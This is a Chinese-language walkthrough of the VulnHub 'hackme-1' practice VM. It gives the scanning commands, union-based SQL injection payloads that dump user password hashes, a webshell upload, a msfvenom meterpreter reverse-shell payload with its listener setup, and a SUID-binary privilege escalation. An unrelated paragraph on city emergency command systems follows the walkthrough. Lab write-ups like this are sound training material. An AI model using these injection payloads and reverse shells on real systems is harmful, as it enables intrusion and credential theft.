vulnbuh-hackme1

下载地址:https://www.vulnhub.com/entry/hackme-1,330/  

测试机系统:kali、win10

测试机IP:192.168.3.140

kali:192.168.3.136

一、信息收集

1.主机发现

netdiscover -r 192.168.28.0/24

发现靶机IP:192.168.3.140

2.端口扫描

masscan --rate=100000 -p 0-65535 192.168.3.140

3.服务扫描

nmap -T4 -sV -O -p 22,80 192.168.3.140 

4.目录扫描

gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.3.140 -t 30

5.访问目录扫描出的网站

访问http://192.168.3.140/login.php

注册一个账号 admin/111111 登录进来

二、漏洞探测

1.查看是否存在sql注入

登录进去之后有一个查询框,点击查询框出现所有信息

输入 OSINT' and 1=1#           #说明存在sql注入

sql注入

OSINT' order by 3#        #判断字段
OSINT' order by 4#        #没有回显 说明字段数为3
-1' union select database(),2,3#       #查库名  得到数据库名称为webapphacking 
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#               查看webapphacking中所有的表


得到数据库中存在books表和users表;猜测users表包含账户信息 :
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#


查看users表所有的列
-1' union select group_concat(user),group_concat(pasword),3 from users#
这里需要用MD5 解密

#登录管理员账号 发现存在文件上传
直接上传图片马 ,使用蚁剑连接

3.上传木马文件

kali里MSF生成木马文件

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.28.137 lport=4444 -f elf >4444.elf

4.监听

msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.28.137   #目标靶机IP
set lport 4444             
explort

随后在中国蚁剑木马文件的目录下打开终端,设置木马文件的权限并运行文件(如果没有设置权限就会出现下图第一次运行文件时的情况:提示权限不足)

chomd +x 4444.elf
./4444.elf

返回kali,可以看到监听成功

四、提权

shell                    #在meterpreter>下
whoami  #显示用户          #这个时候还是普通用户

2.切换终端

获取shell后切换到python终端

python -c 'import pty;pty.spawn("/bin/bash")'

获取root权限

在home目录下发现文件touchmenot,切换到对应路径下,然后运行文件

cd home/legacy
./touchmenot    

运行后就获得了root权限。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
城市应急指挥系统是智慧城市建设的重要组成部分,旨在提高城市对突发事件的预防和处置能力。系统背景源于自然灾害和事故灾难频发,如汶川地震和日本大地震等,这些事件造成了巨大的人员伤亡和财产损失。随着城市化进程的加快,应急信息化建设面临信息资源分散、管理标准不统一等问题,需要通过统筹管理和技术创新来解决。 系统的设计思路是通过先进的技术手段,如物联网、射频识别、卫星定位等,构建一个具有强大信息感知和通信能力的网络和平台。这将促进不同部门和层次之间的信息共享、交流和整合,提高城市资源的利用效率,满足城市对各种信息的获取和使用需求。在“十二五”期间,应急信息化工作将依托这些技术,实现动态监控、风险管理、预警以及统一指挥调度。 应急指挥系统的建设目标是实现快速有效的应对各种突发事件,保障人民生命财产安全,减少社会危害和经济损失。系统将包括预测预警、模拟演练、辅助决策、态势分析等功能,以及应急值守、预案管理、GIS应用等基本应用。此外,还包括支撑平台的建设,如接警中心、视频会议、统一通信等基础设施。 系统的实施将涉及到应急网络建设、应急指挥、视频监控、卫星通信等多个方面。通过高度集成的系统,建立统一的信息接收和处理平台,实现多渠道接入和融合指挥调度。此外,还包括应急指挥中心基础平台建设、固定和移动应急指挥通信系统建设,以及应急队伍建设,确保能够迅速响应并有效处置各类突发事件。 项目的意义在于,它不仅是提升灾害监测预报水平和预警能力的重要科技支撑,也是实现预防和减轻重大灾害和事故损失的关键。通过实施城市应急指挥系统,可以加强社会管理和公共服务,构建和谐社会,为打造平安城市提供坚实的基础。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值